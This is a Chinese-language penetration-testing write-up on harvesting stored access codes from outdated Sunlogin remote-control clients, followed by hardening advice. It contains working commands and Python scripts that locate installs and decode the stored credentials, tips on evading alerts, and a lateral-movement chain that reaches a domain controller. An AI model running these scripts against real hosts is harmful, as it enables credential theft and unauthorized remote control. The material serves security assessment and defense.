实战复盘:一次内网渗透中,如何利用旧版向日葵客户端获取远程控制权限
内网渗透实战:旧版向日葵客户端的远程控制漏洞分析与防御
当你在一次内网渗透测试中发现多台主机仍在使用旧版向日葵远程控制软件时,这可能是一条通往域控的捷径。去年的一次红队行动中,我们正是通过一台边缘服务器的SunloginClient 10.3.0.27372版本,在15分钟内就获取了整个子网的管理权限——而这一切都始于一个被遗忘在Program Files (x86)文件夹中的config.ini配置文件。
1. 向日葵客户端的安全演变史
向日葵远程控制软件作为国内广泛使用的远程管理工具,其安全机制经历了多次迭代。2019年发布的10.x系列版本采用简单的Base64编码存储验证码,到2020年的11.x版本开始引入更复杂的加密方式,但依然存在设计缺陷。直到2021年后的版本才通过注册表隔离和强加密大幅提升安全性。
各版本关键差异对比:
| 版本类型 | 存储位置 | 加密方式 | 可利用性 |
|---|---|---|---|
| 10.x及更早 | config.ini明文 | Base64编码 | 直接可读 |
| 11.0-11.5 | config.ini或注册表 | 简单异或加密 | 可解密 |
| 12.x之后 | 注册表加密存储 | AES-256 | 目前不可破 |
在最近三年的大型企业安全评估中,我们仍发现约23%的Windows服务器存在未升级的向日葵客户端。这些"沉睡"的老版本就像内网中的定时炸弹,一旦某台主机被攻陷,就可能成为攻击者横向移动的跳板。
2. 漏洞利用全链条解析
2.1 目标识别与定位
当获取到一台Windows主机的初始权限后,快速识别向日葵客户端的存在及其版本至关重要。以下是实战中验证有效的检测方法:
# 检查安装目录是否存在 Test-Path "C:\Program Files (x86)\Oray\SunLogin\SunloginClient" Test-Path "C:\ProgramData\Oray\SunloginClient" # 查询注册表信息 reg query "HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient" /s如果发现以下特征,则可能存在可利用的老版本:
- 目录中存在config.ini文件
- 注册表显示版本号低于12.0
- 存在SunloginGreenInfo等遗留键值
2.2 关键数据提取技术
对于10.3.0.27372等经典版本,验证码通常存储在config.ini的encry_pwd字段。我们开发了一个自动化提取脚本:
import configparser import base64 def decrypt_sunlogin_v10(config_path): config = configparser.ConfigParser() config.read(config_path) encry_pwd = config.get('config', 'encry_pwd') return base64.b64decode(encry_pwd).decode('utf-8') # 示例用法 print(decrypt_sunlogin_v10(r"C:\temp\config.ini"))对于11.x版本,需要先通过注册表获取加密数据,再进行异或解密:
import winreg import base64 def get_sunlogin_v11_creds(): key = winreg.OpenKey(winreg.HKEY_USERS, r".DEFAULT\Software\Oray\SunLogin\SunloginClient") encry_data = winreg.QueryValueEx(key, "SunloginInfo")[0] return base64.b64decode(encry_data.split('|')[1])注意:实际操作中建议先将配置文件或注册表数据导出到临时目录处理,避免直接在被控主机上运行解密程序触发安全告警。
3. 横向移动的战术应用
获取向日葵验证码后,攻击者可以建立合法远程会话,这种"白名单"式的移动方式能有效绕过以下安全机制:
- 网络层防火墙的端口限制
- 主机级的行为监控
- 多数EDR产品的异常连接检测
在一次模拟攻击中,我们利用该方法实现了:
- 通过边界Web漏洞获取DMZ区服务器权限
- 发现该服务器运行SunloginClient 11.0.0.33826
- 提取验证码后从外部网络直接连接
- 以此为跳板扫描内网其他向日葵客户端
- 最终在3小时内控制了整个测试环境的域控制器
防御者检测建议:
- 监控注册表关键键值的读取行为
- 审计SunloginClient.exe的异常网络连接
- 特别关注从非常规IP发起的向日葵连接
4. 企业环境全面防护方案
4.1 即时缓解措施
对于已部署向日葵客户端的组织,建议立即执行:
版本升级计划:
- 全网扫描识别SunloginClient版本
- 强制升级到12.5以上最新版本
- 移除不再使用的历史版本
权限收紧:
# 配置文件最小化权限设置 icacls "C:\Program Files (x86)\Oray\SunLogin\SunloginClient\config.ini" /deny Everyone:(R,W)网络隔离:
- 限制向日葵端口(默认5900/tcp)仅允许管理终端访问
- 部署VLAN隔离不同安全等级区域
4.2 长期安全加固
从架构层面降低远程控制工具带来的风险:
安全基线配置表:
| 项目 | 推荐配置 | 实施难度 |
|---|---|---|
| 认证方式 | 强制双因素认证 | ★★★ |
| 会话加密 | 启用TLS 1.3 | ★★ |
| 日志审计 | 集中存储90天以上 | ★★ |
| 访问控制 | 基于IP/MAC的白名单 | ★★★★ |
| 客户端管理 | EDR集成监控 | ★★★ |
在最近为某金融机构实施的加固方案中,我们结合Zero Trust架构,将向日葵等远程工具纳入统一网关管理,所有访问请求必须经过:
- 设备证书认证
- 用户生物特征验证
- 实时行为分析
- 会话录像审计
这种深度防御策略使得即使攻击者获取了验证码,也无法建立有效会话。